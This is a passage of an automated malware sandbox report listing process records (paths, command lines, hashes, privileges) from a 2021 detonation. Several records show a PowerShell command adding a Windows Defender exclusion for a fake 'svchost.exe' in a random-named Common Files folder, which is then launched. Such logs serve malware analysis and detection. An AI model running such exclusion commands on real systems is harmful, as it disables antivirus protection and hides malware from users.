                                                                                Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                Imagebase:0x7ff7488e0000
                                                                                File size:51288 bytes
                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language

                                                                                Analysis Process: svchost.exe PID: 2000 Parent PID: 568

                                                                                General

                                                                                Start time:12:51:00
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                Imagebase:0x7ff7488e0000
                                                                                File size:51288 bytes
                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language

                                                                                Analysis Process: powershell.exe PID: 6236 Parent PID: 5820

                                                                                General

                                                                                Start time:12:51:10
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
                                                                                Imagebase:0x1180000
                                                                                File size:430592 bytes
                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET

                                                                                Analysis Process: conhost.exe PID: 6256 Parent PID: 6236

                                                                                General

                                                                                Start time:12:51:10
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6b2800000
                                                                                File size:625664 bytes
                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                Analysis Process: powershell.exe PID: 6264 Parent PID: 5820

                                                                                General

                                                                                Start time:12:51:10
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
                                                                                Imagebase:0x1180000
                                                                                File size:430592 bytes
                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET

                                                                                Analysis Process: conhost.exe PID: 6312 Parent PID: 6264

                                                                                General

                                                                                Start time:12:51:11
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6b2800000
                                                                                File size:625664 bytes
                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                Analysis Process: powershell.exe PID: 6320 Parent PID: 5820

                                                                                General

                                                                                Start time:12:51:11
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
                                                                                Imagebase:0x1180000
                                                                                File size:430592 bytes
                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET

                                                                                Analysis Process: conhost.exe PID: 6408 Parent PID: 6320

                                                                                General

                                                                                Start time:12:51:13
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6b2800000
                                                                                File size:625664 bytes
                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                Analysis Process: cmd.exe PID: 6644 Parent PID: 5820

                                                                                General

                                                                                Start time:12:51:20
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                                                                Imagebase:0x840000
                                                                                File size:232960 bytes
                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                Analysis Process: conhost.exe PID: 6652 Parent PID: 6644

                                                                                General

                                                                                Start time:12:51:21
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6b2800000
                                                                                File size:625664 bytes
                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                Analysis Process: timeout.exe PID: 6692 Parent PID: 6644

                                                                                General

                                                                                Start time:12:51:22
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\SysWOW64\timeout.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:timeout 1
                                                                                Imagebase:0xed0000
                                                                                File size:26112 bytes
                                                                                MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                Analysis Process: powershell.exe PID: 6860 Parent PID: 3776

                                                                                General

                                                                                Start time:12:51:34
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
                                                                                Imagebase:0x1180000
                                                                                File size:430592 bytes
                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET

                                                                                Analysis Process: conhost.exe PID: 6892 Parent PID: 6860

                                                                                General

                                                                                Start time:12:51:34
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6b2800000
                                                                                File size:625664 bytes
                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                Analysis Process: powershell.exe PID: 6908 Parent PID: 3776

                                                                                General

                                                                                Start time:12:51:34
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
                                                                                Imagebase:0x1180000
                                                                                File size:430592 bytes
                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET

                                                                                Analysis Process: conhost.exe PID: 6980 Parent PID: 6908

                                                                                General

                                                                                Start time:12:51:35
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6b2800000
                                                                                File size:625664 bytes
                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                Analysis Process: powershell.exe PID: 6988 Parent PID: 3776

                                                                                General

                                                                                Start time:12:51:35
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
                                                                                Imagebase:0x1180000
                                                                                File size:430592 bytes
                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET

                                                                                Analysis Process: conhost.exe PID: 7084 Parent PID: 6988

                                                                                General

                                                                                Start time:12:51:37
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6b2800000
                                                                                File size:625664 bytes
                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                Analysis Process: svchost.exe PID: 4468 Parent PID: 5820

                                                                                General

                                                                                Start time:12:51:41
                                                                                Start date:08/04/2021
                                                                                Path:C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe
                                                                                Imagebase:0xa10000
                                                                                File size:46592 bytes
                                                                                MD5 hash:D6B29ADD344D2284845F133B8505126E
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET

                                                                                Disassembly

                                                                                Code Analysis

                                                                                Reset < >